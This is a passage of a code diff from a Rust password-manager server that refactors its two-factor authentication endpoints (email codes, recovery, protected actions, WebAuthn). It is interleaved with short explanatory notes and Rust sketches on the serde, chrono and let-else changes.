// Check password
|
||||||
if !user.check_valid_password(&data.MasterPasswordHash) {
|
if !user.check_valid_password(&data.master_password_hash) {
|
||||||
err!("Username or password is incorrect. Try again.")
|
err!("Username or password is incorrect. Try again.")
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -57,10 +59,9 @@ async fn send_email_login(data: JsonUpcase<SendEmailLoginData>, mut conn: DbConn
 }

 /// Generate the token, save the data for later verification and send email to user
-pub async fn send_token(user_uuid: &str, conn: &mut DbConn) -> EmptyResult {
+pub async fn send_token(user_id: &UserId, conn: &mut DbConn) -> EmptyResult {
     let type_ = TwoFactorType::Email as i32;
-    let mut twofactor =
-        TwoFactor::find_by_user_and_type(user_uuid, type_, conn).await.map_res("Two factor not found")?;
+    let mut twofactor = TwoFactor::find_by_user_and_type(user_id, type_, conn).await.map_res("Two factor not found")?;

     let generated_token = crypto::generate_email_token(CONFIG.email_token_size());

@@ -76,8 +77,8 @@ pub async fn send_token(user_uuid: &str, conn: &mut DbConn) -> EmptyResult {

 /// When user clicks on Manage email 2FA show the user the related information
 #[post("/two-factor/get-email", data = "<data>")]
-async fn get_email(data: JsonUpcase<PasswordOrOtpData>, headers: Headers, mut conn: DbConn) -> JsonResult {
-    let data: PasswordOrOtpData = data.into_inner().data;
+async fn get_email(data: Json<PasswordOrOtpData>, headers: Headers, mut conn: DbConn) -> JsonResult {
+    let data: PasswordOrOtpData = data.into_inner();
     let user = headers.user;

     data.validate(&user, false, &mut conn).await?;
@@ -92,30 +93,30 @@ async fn get_email(data: JsonUpcase<PasswordOrOtpData>, headers: Headers, mut co
     };

     Ok(Json(json!({
-        "Email": mfa_email,
-        "Enabled": enabled,
-        "Object": "twoFactorEmail"
+        "email": mfa_email,
+        "enabled": enabled,
+        "object": "twoFactorEmail"
     })))
 }

 #[derive(Deserialize)]
-#[allow(non_snake_case)]
+#[serde(rename_all = "camelCase")]
 struct SendEmailData {
     /// Email where 2FA codes will be sent to, can be different than user email account.
-    Email: String,
-    MasterPasswordHash: Option<String>,
-    Otp: Option<String>,
+    email: String,
+    master_password_hash: Option<String>,
+    otp: Option<String>,
 }

 /// Send a verification email to the specified email address to check whether it exists/belongs to user.
 #[post("/two-factor/send-email", data = "<data>")]
-async fn send_email(data: JsonUpcase<SendEmailData>, headers: Headers, mut conn: DbConn) -> EmptyResult {
-    let data: SendEmailData = data.into_inner().data;
+async fn send_email(data: Json<SendEmailData>, headers: Headers, mut conn: DbConn) -> EmptyResult {
+    let data: SendEmailData = data.into_inner();
     let user = headers.user;

     PasswordOrOtpData {
-        MasterPasswordHash: data.MasterPasswordHash,
-        Otp: data.Otp,
+        master_password_hash: data.master_password_hash,
+        otp: data.otp,
     }
     .validate(&user, false, &mut conn)
     .await?;
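The recurring change in this diff is dropping the `JsonUpcase` wrapper: request bodies are now deserialized with plain `rocket::serde::json::Json`, and the structs declare `#[serde(rename_all = "camelCase")]` instead of PascalCase field names. A minimal, self-contained sketch of that pattern (the struct mirrors `SendEmailData` above; only `serde` and `serde_json` are assumed as dependencies):

```rust
use serde::Deserialize;

// camelCase JSON keys map onto snake_case Rust fields.
#[derive(Deserialize)]
#[serde(rename_all = "camelCase")]
struct SendEmailData {
    email: String,
    master_password_hash: Option<String>,
    otp: Option<String>,
}

fn main() {
    let body = r#"{"email":"user@example.com","masterPasswordHash":null,"otp":"123456"}"#;
    let data: SendEmailData = serde_json::from_str(body).unwrap();
    assert_eq!(data.email, "user@example.com");
    assert!(data.master_password_hash.is_none());
}
```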
@@ -131,7 +132,7 @@ async fn send_email(data: JsonUpcase<SendEmailData>, headers: Headers, mut conn:
     }

     let generated_token = crypto::generate_email_token(CONFIG.email_token_size());
-    let twofactor_data = EmailTokenData::new(data.Email, generated_token);
+    let twofactor_data = EmailTokenData::new(data.email, generated_token);

     // Uses EmailVerificationChallenge as type to show that it's not verified yet.
     let twofactor = TwoFactor::new(user.uuid, TwoFactorType::EmailVerificationChallenge, twofactor_data.to_json());
@@ -143,24 +144,24 @@ async fn send_email(data: JsonUpcase<SendEmailData>, headers: Headers, mut conn:
 }

 #[derive(Deserialize, Serialize)]
-#[allow(non_snake_case)]
+#[serde(rename_all = "camelCase")]
 struct EmailData {
-    Email: String,
-    Token: String,
-    MasterPasswordHash: Option<String>,
-    Otp: Option<String>,
+    email: String,
+    token: String,
+    master_password_hash: Option<String>,
+    otp: Option<String>,
 }

 /// Verify email belongs to user and can be used for 2FA email codes.
 #[put("/two-factor/email", data = "<data>")]
-async fn email(data: JsonUpcase<EmailData>, headers: Headers, mut conn: DbConn) -> JsonResult {
-    let data: EmailData = data.into_inner().data;
+async fn email(data: Json<EmailData>, headers: Headers, mut conn: DbConn) -> JsonResult {
+    let data: EmailData = data.into_inner();
     let mut user = headers.user;

     // This is the last step in the verification process, delete the otp directly afterwards
     PasswordOrOtpData {
-        MasterPasswordHash: data.MasterPasswordHash,
-        Otp: data.Otp,
+        master_password_hash: data.master_password_hash,
+        otp: data.otp,
     }
     .validate(&user, true, &mut conn)
     .await?;
@@ -171,12 +172,11 @@ async fn email(data: JsonUpcase<EmailData>, headers: Headers, mut conn: DbConn)

     let mut email_data = EmailTokenData::from_json(&twofactor.data)?;

-    let issued_token = match &email_data.last_token {
-        Some(t) => t,
-        _ => err!("No token available"),
+    let Some(issued_token) = &email_data.last_token else {
+        err!("No token available")
     };

-    if !crypto::ct_eq(issued_token, data.Token) {
+    if !crypto::ct_eq(issued_token, data.token) {
         err!("Token is invalid")
     }

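The `match`-to-`let ... else` rewrites above all follow one shape: bind the `Some` value or diverge. A small sketch assuming nothing beyond Rust 1.65+ (`issued_token` here is a stand-in function, not vaultwarden's):

```rust
fn issued_token(last_token: &Option<String>) -> Result<&str, &'static str> {
    // The else branch must diverge; `return Err(...)` plays the role of the
    // `_ => err!("No token available")` match arm in the real code.
    let Some(token) = last_token else {
        return Err("No token available");
    };
    Ok(token.as_str())
}

fn main() {
    assert_eq!(issued_token(&Some("abc123".into())), Ok("abc123"));
    assert!(issued_token(&None).is_err());
}
```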
@@ -190,26 +190,31 @@ async fn email(data: JsonUpcase<EmailData>, headers: Headers, mut conn: DbConn)
     log_user_event(EventType::UserUpdated2fa as i32, &user.uuid, headers.device.atype, &headers.ip.ip, &mut conn).await;

     Ok(Json(json!({
-        "Email": email_data.email,
-        "Enabled": "true",
-        "Object": "twoFactorEmail"
+        "email": email_data.email,
+        "enabled": "true",
+        "object": "twoFactorEmail"
     })))
 }

 /// Validate the email code when used as TwoFactor token mechanism
-pub async fn validate_email_code_str(user_uuid: &str, token: &str, data: &str, conn: &mut DbConn) -> EmptyResult {
+pub async fn validate_email_code_str(
+    user_id: &UserId,
+    token: &str,
+    data: &str,
+    ip: &std::net::IpAddr,
+    conn: &mut DbConn,
+) -> EmptyResult {
     let mut email_data = EmailTokenData::from_json(data)?;
-    let mut twofactor = TwoFactor::find_by_user_and_type(user_uuid, TwoFactorType::Email as i32, conn)
+    let mut twofactor = TwoFactor::find_by_user_and_type(user_id, TwoFactorType::Email as i32, conn)
         .await
         .map_res("Two factor not found")?;
-    let issued_token = match &email_data.last_token {
-        Some(t) => t,
-        _ => err!(
-            "No token available",
+    let Some(issued_token) = &email_data.last_token else {
+        err!(
+            format!("No token available! IP: {ip}"),
             ErrorEvent {
                 event: EventType::UserFailedLogIn2fa
             }
-        ),
+        )
     };

     if !crypto::ct_eq(issued_token, token) {
@@ -221,7 +226,7 @@ pub async fn validate_email_code_str(user_uuid: &str, token: &str, data: &str, c
         twofactor.save(conn).await?;

         err!(
-            "Token is invalid",
+            format!("Token is invalid! IP: {ip}"),
             ErrorEvent {
                 event: EventType::UserFailedLogIn2fa
             }
@@ -232,9 +237,9 @@ pub async fn validate_email_code_str(user_uuid: &str, token: &str, data: &str, c
     twofactor.data = email_data.to_json();
     twofactor.save(conn).await?;

-    let date = NaiveDateTime::from_timestamp_opt(email_data.token_sent, 0).expect("Email token timestamp invalid.");
+    let date = DateTime::from_timestamp(email_data.token_sent, 0).expect("Email token timestamp invalid.").naive_utc();
     let max_time = CONFIG.email_expiration_time() as i64;
-    if date + Duration::seconds(max_time) < Utc::now().naive_utc() {
+    if date + TimeDelta::try_seconds(max_time).unwrap() < Utc::now().naive_utc() {
         err!(
             "Token has expired",
             ErrorEvent {
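The timestamp handling above tracks chrono's API evolution: `NaiveDateTime::from_timestamp_opt` is deprecated in favor of `DateTime::from_timestamp`, and the diff also moves to the fallible `TimeDelta::try_seconds`. A sketch of the expiry check, with `chrono` as the only assumed dependency:

```rust
use chrono::{DateTime, TimeDelta, Utc};

// Returns true when `token_sent` (a UNIX timestamp) is older than `max_age_secs`.
fn token_expired(token_sent: i64, max_age_secs: i64) -> bool {
    let sent = DateTime::from_timestamp(token_sent, 0)
        .expect("Email token timestamp invalid.")
        .naive_utc();
    sent + TimeDelta::try_seconds(max_age_secs).unwrap() < Utc::now().naive_utc()
}

fn main() {
    // A token sent at the UNIX epoch is long past any sane expiration window.
    assert!(token_expired(0, 300));
    assert!(!token_expired(Utc::now().timestamp(), 300));
}
```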
@@ -265,14 +270,14 @@ impl EmailTokenData {
         EmailTokenData {
             email,
             last_token: Some(token),
-            token_sent: Utc::now().naive_utc().timestamp(),
+            token_sent: Utc::now().timestamp(),
             attempts: 0,
         }
     }

     pub fn set_token(&mut self, token: String) {
         self.last_token = Some(token);
-        self.token_sent = Utc::now().naive_utc().timestamp();
+        self.token_sent = Utc::now().timestamp();
     }

     pub fn reset_token(&mut self) {
@@ -289,7 +294,7 @@ impl EmailTokenData {
     }

     pub fn from_json(string: &str) -> Result<EmailTokenData, Error> {
-        let res: Result<EmailTokenData, crate::serde_json::Error> = serde_json::from_str(string);
+        let res: Result<EmailTokenData, serde_json::Error> = serde_json::from_str(string);
         match res {
             Ok(x) => Ok(x),
             Err(_) => err!("Could not decode EmailTokenData from string"),
@@ -297,6 +302,15 @@ impl EmailTokenData {
     }
 }

+pub async fn activate_email_2fa(user: &User, conn: &mut DbConn) -> EmptyResult {
+    if user.verified_at.is_none() {
+        err!("Auto-enabling of email 2FA failed because the users email address has not been verified!");
+    }
+    let twofactor_data = EmailTokenData::new(user.email.clone(), String::new());
+    let twofactor = TwoFactor::new(user.uuid.clone(), TwoFactorType::Email, twofactor_data.to_json());
+    twofactor.save(conn).await
+}
+
 /// Takes an email address and obscures it by replacing it with asterisks except two characters.
 pub fn obscure_email(email: &str) -> String {
     let split: Vec<&str> = email.rsplitn(2, '@').collect();
@@ -315,7 +329,15 @@ pub fn obscure_email(email: &str) -> String {
         }
     };

-    format!("{}@{}", new_name, &domain)
+    format!("{new_name}@{domain}")
+}
+
+pub async fn find_and_activate_email_2fa(user_id: &UserId, conn: &mut DbConn) -> EmptyResult {
+    if let Some(user) = User::find_by_uuid(user_id, conn).await {
+        activate_email_2fa(&user, conn).await
+    } else {
+        err!("User not found!");
+    }
 }

 #[cfg(test)]
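`obscure_email` splits with `rsplitn(2, '@')`, so only the last `@` separates the local part from the domain and the pieces come back right-to-left. A self-contained sketch of just that trick (the helper name is hypothetical):

```rust
// rsplitn(2, '@') yields at most two pieces, domain first, because it scans
// from the right: "john.doe@example.com" -> ["example.com", "john.doe"].
fn split_email(email: &str) -> (&str, &str) {
    let split: Vec<&str> = email.rsplitn(2, '@').collect();
    (split[1], split[0]) // (local part, domain)
}

fn main() {
    assert_eq!(split_email("john.doe@example.com"), ("john.doe", "example.com"));
}
```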
src/api/core/two_factor/mod.rs
@@ -1,4 +1,4 @@
-use chrono::{Duration, Utc};
+use chrono::{TimeDelta, Utc};
 use data_encoding::BASE32;
 use rocket::serde::json::Json;
 use rocket::Route;
@@ -7,7 +7,7 @@ use serde_json::Value;
 use crate::{
     api::{
         core::{log_event, log_user_event},
-        EmptyResult, JsonResult, JsonUpcase, PasswordOrOtpData,
+        EmptyResult, JsonResult, PasswordOrOtpData,
     },
     auth::{ClientHeaders, Headers},
     crypto,
@@ -19,6 +19,7 @@ use crate::{

 pub mod authenticator;
 pub mod duo;
+pub mod duo_oidc;
 pub mod email;
 pub mod protected_actions;
 pub mod webauthn;
@@ -50,52 +51,51 @@ async fn get_twofactor(headers: Headers, mut conn: DbConn) -> Json<Value> {
     let twofactors_json: Vec<Value> = twofactors.iter().map(TwoFactor::to_json_provider).collect();

     Json(json!({
-        "Data": twofactors_json,
-        "Object": "list",
-        "ContinuationToken": null,
+        "data": twofactors_json,
+        "object": "list",
+        "continuationToken": null,
     }))
 }

 #[post("/two-factor/get-recover", data = "<data>")]
-async fn get_recover(data: JsonUpcase<PasswordOrOtpData>, headers: Headers, mut conn: DbConn) -> JsonResult {
-    let data: PasswordOrOtpData = data.into_inner().data;
+async fn get_recover(data: Json<PasswordOrOtpData>, headers: Headers, mut conn: DbConn) -> JsonResult {
+    let data: PasswordOrOtpData = data.into_inner();
     let user = headers.user;

     data.validate(&user, true, &mut conn).await?;

     Ok(Json(json!({
-        "Code": user.totp_recover,
-        "Object": "twoFactorRecover"
+        "code": user.totp_recover,
+        "object": "twoFactorRecover"
     })))
 }

 #[derive(Deserialize)]
-#[allow(non_snake_case)]
+#[serde(rename_all = "camelCase")]
 struct RecoverTwoFactor {
-    MasterPasswordHash: String,
-    Email: String,
-    RecoveryCode: String,
+    master_password_hash: String,
+    email: String,
+    recovery_code: String,
 }

 #[post("/two-factor/recover", data = "<data>")]
-async fn recover(data: JsonUpcase<RecoverTwoFactor>, client_headers: ClientHeaders, mut conn: DbConn) -> JsonResult {
-    let data: RecoverTwoFactor = data.into_inner().data;
+async fn recover(data: Json<RecoverTwoFactor>, client_headers: ClientHeaders, mut conn: DbConn) -> JsonResult {
+    let data: RecoverTwoFactor = data.into_inner();

     use crate::db::models::User;

     // Get the user
-    let mut user = match User::find_by_mail(&data.Email, &mut conn).await {
-        Some(user) => user,
-        None => err!("Username or password is incorrect. Try again."),
+    let Some(mut user) = User::find_by_mail(&data.email, &mut conn).await else {
+        err!("Username or password is incorrect. Try again.")
     };

     // Check password
-    if !user.check_valid_password(&data.MasterPasswordHash) {
+    if !user.check_valid_password(&data.master_password_hash) {
         err!("Username or password is incorrect. Try again.")
     }

     // Check if recovery code is correct
-    if !user.check_valid_recovery_code(&data.RecoveryCode) {
+    if !user.check_valid_recovery_code(&data.recovery_code) {
         err!("Recovery code is incorrect. Try again.")
     }

@@ -127,27 +127,27 @@ async fn _generate_recover_code(user: &mut User, conn: &mut DbConn) {
 }

 #[derive(Deserialize)]
-#[allow(non_snake_case)]
+#[serde(rename_all = "camelCase")]
 struct DisableTwoFactorData {
-    MasterPasswordHash: Option<String>,
-    Otp: Option<String>,
-    Type: NumberOrString,
+    master_password_hash: Option<String>,
+    otp: Option<String>,
+    r#type: NumberOrString,
 }

 #[post("/two-factor/disable", data = "<data>")]
-async fn disable_twofactor(data: JsonUpcase<DisableTwoFactorData>, headers: Headers, mut conn: DbConn) -> JsonResult {
-    let data: DisableTwoFactorData = data.into_inner().data;
+async fn disable_twofactor(data: Json<DisableTwoFactorData>, headers: Headers, mut conn: DbConn) -> JsonResult {
+    let data: DisableTwoFactorData = data.into_inner();
     let user = headers.user;

     // Delete directly after a valid token has been provided
     PasswordOrOtpData {
-        MasterPasswordHash: data.MasterPasswordHash,
-        Otp: data.Otp,
+        master_password_hash: data.master_password_hash,
+        otp: data.otp,
     }
     .validate(&user, true, &mut conn)
     .await?;

-    let type_ = data.Type.into_i32()?;
+    let type_ = data.r#type.into_i32()?;

     if let Some(twofactor) = TwoFactor::find_by_user_and_type(&user.uuid, type_, &mut conn).await {
         twofactor.delete(&mut conn).await?;
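`DisableTwoFactorData` above needs a field that deserializes from the JSON key `"type"`, but `type` is a Rust keyword; the raw identifier `r#type` sidesteps that, and serde strips the `r#` prefix when deriving the key name. A self-contained sketch (`u32` stands in for vaultwarden's `NumberOrString`):

```rust
use serde::Deserialize;

#[derive(Deserialize)]
#[serde(rename_all = "camelCase")]
struct DisableTwoFactorData {
    r#type: u32, // serde sees this field as "type"
}

fn main() {
    let data: DisableTwoFactorData = serde_json::from_str(r#"{"type":1}"#).unwrap();
    assert_eq!(data.r#type, 1);
}
```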
@@ -160,30 +160,29 @@ async fn disable_twofactor(data: JsonUpcase<DisableTwoFactorData>, headers: Head
     }

     Ok(Json(json!({
-        "Enabled": false,
-        "Type": type_,
-        "Object": "twoFactorProvider"
+        "enabled": false,
+        "type": type_,
+        "object": "twoFactorProvider"
     })))
 }

 #[put("/two-factor/disable", data = "<data>")]
-async fn disable_twofactor_put(data: JsonUpcase<DisableTwoFactorData>, headers: Headers, conn: DbConn) -> JsonResult {
+async fn disable_twofactor_put(data: Json<DisableTwoFactorData>, headers: Headers, conn: DbConn) -> JsonResult {
     disable_twofactor(data, headers, conn).await
 }

 pub async fn enforce_2fa_policy(
     user: &User,
-    act_uuid: &str,
+    act_user_id: &UserId,
     device_type: i32,
     ip: &std::net::IpAddr,
     conn: &mut DbConn,
 ) -> EmptyResult {
-    for member in UserOrganization::find_by_user_and_policy(&user.uuid, OrgPolicyType::TwoFactorAuthentication, conn)
-        .await
-        .into_iter()
+    for member in
+        Membership::find_by_user_and_policy(&user.uuid, OrgPolicyType::TwoFactorAuthentication, conn).await.into_iter()
     {
         // Policy only applies to non-Owner/non-Admin members who have accepted joining the org
-        if member.atype < UserOrgType::Admin {
+        if member.atype < MembershipType::Admin {
             if CONFIG.mail_enabled() {
                 let org = Organization::find_by_uuid(&member.org_uuid, conn).await.unwrap();
                 mail::send_2fa_removed_from_org(&user.email, &org.name).await?;
@@ -196,7 +195,7 @@ pub async fn enforce_2fa_policy(
                 EventType::OrganizationUserRevoked as i32,
                 &member.uuid,
                 &member.org_uuid,
-                act_uuid,
+                act_user_id,
                 device_type,
                 ip,
                 conn,
@@ -209,16 +208,16 @@ pub async fn enforce_2fa_policy(
 }

 pub async fn enforce_2fa_policy_for_org(
-    org_uuid: &str,
-    act_uuid: &str,
+    org_id: &OrganizationId,
+    act_user_id: &UserId,
     device_type: i32,
     ip: &std::net::IpAddr,
     conn: &mut DbConn,
 ) -> EmptyResult {
-    let org = Organization::find_by_uuid(org_uuid, conn).await.unwrap();
-    for member in UserOrganization::find_confirmed_by_org(org_uuid, conn).await.into_iter() {
+    let org = Organization::find_by_uuid(org_id, conn).await.unwrap();
+    for member in Membership::find_confirmed_by_org(org_id, conn).await.into_iter() {
         // Don't enforce the policy for Admins and Owners.
-        if member.atype < UserOrgType::Admin && TwoFactor::find_by_user(&member.user_uuid, conn).await.is_empty() {
+        if member.atype < MembershipType::Admin && TwoFactor::find_by_user(&member.user_uuid, conn).await.is_empty() {
             if CONFIG.mail_enabled() {
                 let user = User::find_by_uuid(&member.user_uuid, conn).await.unwrap();
                 mail::send_2fa_removed_from_org(&user.email, &org.name).await?;
@@ -230,8 +229,8 @@ pub async fn enforce_2fa_policy_for_org(
             log_event(
                 EventType::OrganizationUserRevoked as i32,
                 &member.uuid,
-                org_uuid,
-                act_uuid,
+                org_id,
+                act_user_id,
                 device_type,
                 ip,
                 conn,
@@ -259,7 +258,7 @@ pub async fn send_incomplete_2fa_notifications(pool: DbPool) {
     };

     let now = Utc::now().naive_utc();
-    let time_limit = Duration::minutes(CONFIG.incomplete_2fa_time_limit());
+    let time_limit = TimeDelta::try_minutes(CONFIG.incomplete_2fa_time_limit()).unwrap();
     let time_before = now - time_limit;
     let incomplete_logins = TwoFactorIncomplete::find_logins_before(&time_before, &mut conn).await;
     for login in incomplete_logins {
@@ -268,10 +267,24 @@ pub async fn send_incomplete_2fa_notifications(pool: DbPool) {
             "User {} did not complete a 2FA login within the configured time limit. IP: {}",
             user.email, login.ip_address
         );
-        mail::send_incomplete_2fa_login(&user.email, &login.ip_address, &login.login_time, &login.device_name)
-            .await
-            .expect("Error sending incomplete 2FA email");
-        login.delete(&mut conn).await.expect("Error deleting incomplete 2FA record");
+        match mail::send_incomplete_2fa_login(
+            &user.email,
+            &login.ip_address,
+            &login.login_time,
+            &login.device_name,
+            &DeviceType::from_i32(login.device_type).to_string(),
+        )
+        .await
+        {
+            Ok(_) => {
+                if let Err(e) = login.delete(&mut conn).await {
+                    error!("Error deleting incomplete 2FA record: {e:#?}");
+                }
+            }
+            Err(e) => {
+                error!("Error sending incomplete 2FA email: {e:#?}");
+            }
+        }
     }
 }

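The notification loop above replaces two `.expect()` calls, which would have panicked the background job on the first undeliverable mail, with a `match` that logs and moves on. A sketch of the control flow, with plain `Result` values standing in for the mail and database calls:

```rust
fn process(send: Result<(), String>, delete: Result<(), String>) {
    match send {
        // Only clean up the record when the mail actually went out.
        Ok(_) => {
            if let Err(e) = delete {
                eprintln!("Error deleting incomplete 2FA record: {e:#?}");
            }
        }
        // A failed send is logged; the surrounding loop keeps going.
        Err(e) => eprintln!("Error sending incomplete 2FA email: {e:#?}"),
    }
}

fn main() {
    process(Ok(()), Ok(()));                     // happy path, nothing logged
    process(Err("SMTP timeout".into()), Ok(())); // logged instead of panicking
}
```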
src/api/core/two_factor/protected_actions.rs
@@ -1,12 +1,12 @@
-use chrono::{Duration, NaiveDateTime, Utc};
-use rocket::Route;
+use chrono::{DateTime, TimeDelta, Utc};
+use rocket::{serde::json::Json, Route};

 use crate::{
-    api::{EmptyResult, JsonUpcase},
+    api::EmptyResult,
     auth::Headers,
     crypto,
     db::{
-        models::{TwoFactor, TwoFactorType},
+        models::{TwoFactor, TwoFactorType, UserId},
         DbConn,
     },
     error::{Error, MapResult},
@@ -18,7 +18,7 @@ pub fn routes() -> Vec<Route> {
 }

 /// Data stored in the TwoFactor table in the db
-#[derive(Serialize, Deserialize, Debug)]
+#[derive(Debug, Serialize, Deserialize)]
 pub struct ProtectedActionData {
     /// Token issued to validate the protected action
     pub token: String,
@@ -32,7 +32,7 @@ impl ProtectedActionData {
     pub fn new(token: String) -> Self {
         Self {
             token,
-            token_sent: Utc::now().naive_utc().timestamp(),
+            token_sent: Utc::now().timestamp(),
             attempts: 0,
         }
     }
@@ -42,7 +42,7 @@ impl ProtectedActionData {
     }

     pub fn from_json(string: &str) -> Result<Self, Error> {
-        let res: Result<Self, crate::serde_json::Error> = serde_json::from_str(string);
+        let res: Result<Self, serde_json::Error> = serde_json::from_str(string);
         match res {
             Ok(x) => Ok(x),
             Err(_) => err!("Could not decode ProtectedActionData from string"),
@@ -82,32 +82,33 @@ async fn request_otp(headers: Headers, mut conn: DbConn) -> EmptyResult {
 }

 #[derive(Deserialize, Serialize, Debug)]
-#[allow(non_snake_case)]
+#[serde(rename_all = "camelCase")]
 struct ProtectedActionVerify {
-    OTP: String,
+    #[serde(rename = "OTP", alias = "otp")]
+    otp: String,
 }

 #[post("/accounts/verify-otp", data = "<data>")]
-async fn verify_otp(data: JsonUpcase<ProtectedActionVerify>, headers: Headers, mut conn: DbConn) -> EmptyResult {
+async fn verify_otp(data: Json<ProtectedActionVerify>, headers: Headers, mut conn: DbConn) -> EmptyResult {
     if !CONFIG.mail_enabled() {
         err!("Email is disabled for this server. Either enable email or login using your master password instead of login via device.");
     }

     let user = headers.user;
-    let data: ProtectedActionVerify = data.into_inner().data;
+    let data: ProtectedActionVerify = data.into_inner();

     // Delete the token after one validation attempt
     // This endpoint only gets called for the vault export, and doesn't need a second attempt
-    validate_protected_action_otp(&data.OTP, &user.uuid, true, &mut conn).await
+    validate_protected_action_otp(&data.otp, &user.uuid, true, &mut conn).await
 }

 pub async fn validate_protected_action_otp(
     otp: &str,
-    user_uuid: &str,
+    user_id: &UserId,
     delete_if_valid: bool,
     conn: &mut DbConn,
 ) -> EmptyResult {
-    let pa = TwoFactor::find_by_user_and_type(user_uuid, TwoFactorType::ProtectedActions as i32, conn)
+    let pa = TwoFactor::find_by_user_and_type(user_id, TwoFactorType::ProtectedActions as i32, conn)
         .await
         .map_res("Protected action token not found, try sending the code again or restart the process")?;
     let mut pa_data = ProtectedActionData::from_json(&pa.data)?;
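`ProtectedActionVerify` keeps `rename = "OTP"` as the canonical key while `alias = "otp"` also accepts the camelCase spelling, so both client generations deserialize during the migration. A minimal sketch:

```rust
use serde::Deserialize;

#[derive(Deserialize)]
struct ProtectedActionVerify {
    // `rename` sets the expected key; `alias` adds a second accepted key.
    #[serde(rename = "OTP", alias = "otp")]
    otp: String,
}

fn main() {
    let old: ProtectedActionVerify = serde_json::from_str(r#"{"OTP":"123456"}"#).unwrap();
    let new: ProtectedActionVerify = serde_json::from_str(r#"{"otp":"123456"}"#).unwrap();
    assert_eq!(old.otp, new.otp);
}
```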
@@ -122,9 +123,9 @@ pub async fn validate_protected_action_otp(

     // Check if the token has expired (Using the email 2fa expiration time)
     let date =
-        NaiveDateTime::from_timestamp_opt(pa_data.token_sent, 0).expect("Protected Action token timestamp invalid.");
+        DateTime::from_timestamp(pa_data.token_sent, 0).expect("Protected Action token timestamp invalid.").naive_utc();
     let max_time = CONFIG.email_expiration_time() as i64;
-    if date + Duration::seconds(max_time) < Utc::now().naive_utc() {
+    if date + TimeDelta::try_seconds(max_time).unwrap() < Utc::now().naive_utc() {
         pa.delete(conn).await?;
         err!("Token has expired")
     }
src/api/core/two_factor/webauthn.rs
@@ -7,11 +7,11 @@ use webauthn_rs::{base64_data::Base64UrlSafeData, proto::*, AuthenticationState,
 use crate::{
     api::{
         core::{log_user_event, two_factor::_generate_recover_code},
-        EmptyResult, JsonResult, JsonUpcase, PasswordOrOtpData,
+        EmptyResult, JsonResult, PasswordOrOtpData,
     },
     auth::Headers,
     db::{
-        models::{EventType, TwoFactor, TwoFactorType},
+        models::{EventType, TwoFactor, TwoFactorType, UserId},
         DbConn,
     },
     error::Error,
@@ -96,20 +96,20 @@ pub struct WebauthnRegistration {
 impl WebauthnRegistration {
     fn to_json(&self) -> Value {
         json!({
-            "Id": self.id,
-            "Name": self.name,
+            "id": self.id,
+            "name": self.name,
             "migrated": self.migrated,
         })
     }
 }

 #[post("/two-factor/get-webauthn", data = "<data>")]
-async fn get_webauthn(data: JsonUpcase<PasswordOrOtpData>, headers: Headers, mut conn: DbConn) -> JsonResult {
+async fn get_webauthn(data: Json<PasswordOrOtpData>, headers: Headers, mut conn: DbConn) -> JsonResult {
     if !CONFIG.domain_set() {
         err!("`DOMAIN` environment variable is not set. Webauthn disabled")
     }

-    let data: PasswordOrOtpData = data.into_inner().data;
+    let data: PasswordOrOtpData = data.into_inner();
     let user = headers.user;

     data.validate(&user, false, &mut conn).await?;
@@ -118,19 +118,15 @@ async fn get_webauthn(data: JsonUpcase<PasswordOrOtpData>, headers: Headers, mut
     let registrations_json: Vec<Value> = registrations.iter().map(WebauthnRegistration::to_json).collect();

     Ok(Json(json!({
-        "Enabled": enabled,
-        "Keys": registrations_json,
-        "Object": "twoFactorWebAuthn"
+        "enabled": enabled,
+        "keys": registrations_json,
+        "object": "twoFactorWebAuthn"
     })))
 }

 #[post("/two-factor/get-webauthn-challenge", data = "<data>")]
-async fn generate_webauthn_challenge(
-    data: JsonUpcase<PasswordOrOtpData>,
-    headers: Headers,
-    mut conn: DbConn,
-) -> JsonResult {
-    let data: PasswordOrOtpData = data.into_inner().data;
+async fn generate_webauthn_challenge(data: Json<PasswordOrOtpData>, headers: Headers, mut conn: DbConn) -> JsonResult {
+    let data: PasswordOrOtpData = data.into_inner();
     let user = headers.user;

     data.validate(&user, false, &mut conn).await?;
@@ -152,7 +148,7 @@ async fn generate_webauthn_challenge(
     )?;

     let type_ = TwoFactorType::WebauthnRegisterChallenge;
-    TwoFactor::new(user.uuid, type_, serde_json::to_string(&state)?).save(&mut conn).await?;
+    TwoFactor::new(user.uuid.clone(), type_, serde_json::to_string(&state)?).save(&mut conn).await?;

     let mut challenge_value = serde_json::to_value(challenge.public_key)?;
     challenge_value["status"] = "ok".into();
@@ -161,102 +157,94 @@ async fn generate_webauthn_challenge(
 }

 #[derive(Debug, Deserialize)]
-#[allow(non_snake_case)]
+#[serde(rename_all = "camelCase")]
 struct EnableWebauthnData {
-    Id: NumberOrString, // 1..5
-    Name: String,
-    DeviceResponse: RegisterPublicKeyCredentialCopy,
-    MasterPasswordHash: Option<String>,
-    Otp: Option<String>,
+    id: NumberOrString, // 1..5
+    name: String,
+    device_response: RegisterPublicKeyCredentialCopy,
+    master_password_hash: Option<String>,
+    otp: Option<String>,
 }

-// This is copied from RegisterPublicKeyCredential to change the Response objects casing
 #[derive(Debug, Deserialize)]
-#[allow(non_snake_case)]
+#[serde(rename_all = "camelCase")]
 struct RegisterPublicKeyCredentialCopy {
-    pub Id: String,
-    pub RawId: Base64UrlSafeData,
-    pub Response: AuthenticatorAttestationResponseRawCopy,
-    pub Type: String,
+    pub id: String,
+    pub raw_id: Base64UrlSafeData,
+    pub response: AuthenticatorAttestationResponseRawCopy,
+    pub r#type: String,
 }

 // This is copied from AuthenticatorAttestationResponseRaw to change clientDataJSON to clientDataJson
 #[derive(Debug, Deserialize)]
-#[allow(non_snake_case)]
+#[serde(rename_all = "camelCase")]
 pub struct AuthenticatorAttestationResponseRawCopy {
-    pub AttestationObject: Base64UrlSafeData,
-    pub ClientDataJson: Base64UrlSafeData,
+    #[serde(rename = "AttestationObject", alias = "attestationObject")]
+    pub attestation_object: Base64UrlSafeData,
+    #[serde(rename = "clientDataJson", alias = "clientDataJSON")]
+    pub client_data_json: Base64UrlSafeData,
 }

 impl From<RegisterPublicKeyCredentialCopy> for RegisterPublicKeyCredential {
     fn from(r: RegisterPublicKeyCredentialCopy) -> Self {
         Self {
-            id: r.Id,
-            raw_id: r.RawId,
+            id: r.id,
+            raw_id: r.raw_id,
             response: AuthenticatorAttestationResponseRaw {
-                attestation_object: r.Response.AttestationObject,
-                client_data_json: r.Response.ClientDataJson,
+                attestation_object: r.response.attestation_object,
+                client_data_json: r.response.client_data_json,
             },
-            type_: r.Type,
+            type_: r.r#type,
         }
     }
 }

